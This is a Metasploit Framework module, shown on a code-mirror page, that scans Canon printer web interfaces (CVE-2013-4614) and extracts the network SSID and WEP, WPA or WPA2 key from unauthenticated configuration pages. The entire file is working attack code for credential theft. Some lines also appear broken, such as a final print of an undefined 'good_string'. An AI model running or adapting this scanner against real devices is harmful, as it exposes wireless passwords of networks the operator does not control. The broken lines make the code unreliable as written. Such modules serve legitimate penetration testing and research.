Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/scanner/http/canon_wireless.rb
19715 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
require 'nokogiri'
7
8
class MetasploitModule < Msf::Auxiliary
9
include Msf::Auxiliary::Report
10
include Msf::Exploit::Remote::HttpClient
11
include Msf::Auxiliary::Scanner
12
13
def initialize(info = {})
14
super(
15
update_info(
16
info,
17
'Name' => 'Canon Printer Wireless Configuration Disclosure',
18
'Description' => %q{
19
This module enumerates wireless credentials from Canon printers with a web interface.
20
It has been tested on Canon models: MG3100, MG5300, MG6100, MP495, MX340, MX870,
21
MX890, MX920.
22
},
23
'License' => MSF_LICENSE,
24
'Author' => [
25
'Matt "hostess" Andreko <mandreko[at]accuvant.com>'
26
],
27
'References' => [
28
[ 'CVE', '2013-4614' ],
29
[ 'OSVDB', '94417' ],
30
[ 'URL', 'https://www.mattandreko.com/2013/06/canon-y-u-no-security.html']
31
],
32
'DisclosureDate' => '2013-06-18',
33
'Notes' => {
34
'Reliability' => UNKNOWN_RELIABILITY,
35
'Stability' => UNKNOWN_STABILITY,
36
'SideEffects' => UNKNOWN_SIDE_EFFECTS
37
}
38
)
39
)
40
end
41
42
def get_network_settings
43
begin
44
res = send_request_cgi({
45
'method' => 'GET',
46
'uri' => '/English/pages_MacUS/lan_set_content.html',
47
})
48
rescue
49
print_error("#{rhost}:#{rport} Could not connect.")
50
return
51
end
52
53
if res
54
if res.code == 200
55
56
html = Nokogiri::HTML(res.body)
57
58
checked_lan_setting = html.xpath '//input[@name="LAN_OPT1" and @checked]'
59
60
if checked_lan_setting.count == 1
61
lan_setting = ''
62
ssid = ''
63
case checked_lan_setting[0]['value']
64
when '0'
65
lan_setting = 'Do not use LAN'
66
when '1'
67
lan_setting = 'Use wired LAN'
68
when '2'
69
lan_setting = 'Use wireless LAN'
70
71
ssid_input = html.xpath '//input[@name="LAN_TXT1"]'
72
ssid = ssid_input[0]['value'] if ssid_input.count == 1
73
end
74
75
return lan_setting, ssid
76
else
77
print_error("#{rhost}:#{rport} Could not determine LAN Settings.")
78
end
79
80
elsif res.code == 401
81
print_error("#{rhost}:#{rport} Authentication failed")
82
elsif res.code == 404
83
print_error("#{rhost}:#{rport} File not found")
84
end
85
end
86
end
87
88
def get_wireless_key
89
begin
90
res = send_request_cgi({
91
'method' => 'GET',
92
'uri' => "/English/pages_MacUS/wls_set_content.html",
93
})
94
rescue
95
print_error("#{ip}:#{rport} Could not connect.")
96
return
97
end
98
99
if res
100
if res.code == 200
101
html = Nokogiri::HTML(res.body)
102
encryption_setting = ''
103
encryption_key = ''
104
105
checked_encryption_setting = html.xpath '//input[@name="WLS_OPT1" and @checked]'
106
case checked_encryption_setting[0]['value']
107
when '0'
108
encryption_setting = 'None'
109
when '1'
110
encryption_setting = 'WEP'
111
wep_key_inputs = html.xpath '//input[starts-with(@name, "WLS_TXT1") and not(@value="")]'
112
encryption_key = wep_key_inputs.collect { |x| x['value'] }.join(', ')
113
when '2'
114
encryption_setting = 'WPA'
115
wpa_key_input = html.xpath '//input[@name="WLS_TXT2"]'
116
encryption_key = wpa_key_input[0]['value']
117
when '3'
118
encryption_setting = 'WPA2'
119
wpa2_key_input = html.xpath '//input[@name="WLS_TXT3"]'
120
encryption_key = wpa2_key_input[0]['value']
121
end
122
123
return encryption_setting, encryption_key
124
125
elsif res.code == 401
126
print_error("#{rhost}:#{rport} Authentication failed")
127
elsif res.code == 404
128
print_error("#{rhost}:#{rport} File not found")
129
end
130
end
131
end
132
133
def run_host(ip)
134
ns = get_network_settings
135
return if ns.nil?
136
137
data = {
138
:rhost => rhost,
139
:rport => rport,
140
:option => ns[0]
141
}
142
if ns[0] == 'Use wireless LAN'
143
wireless_key = get_wireless_key
144
data.merge!(
145
{
146
:ssid => ns[1],
147
:encryption_type => wireless_key[0],
148
:key => wireless_key[1]
149
}
150
)
151
end
152
153
report_note({
154
:data => data,
155
:type => 'canon.wireless',
156
:host => ip,
157
:port => rport
158
})
159
160
print_good good_string
161
end
162
end
163
164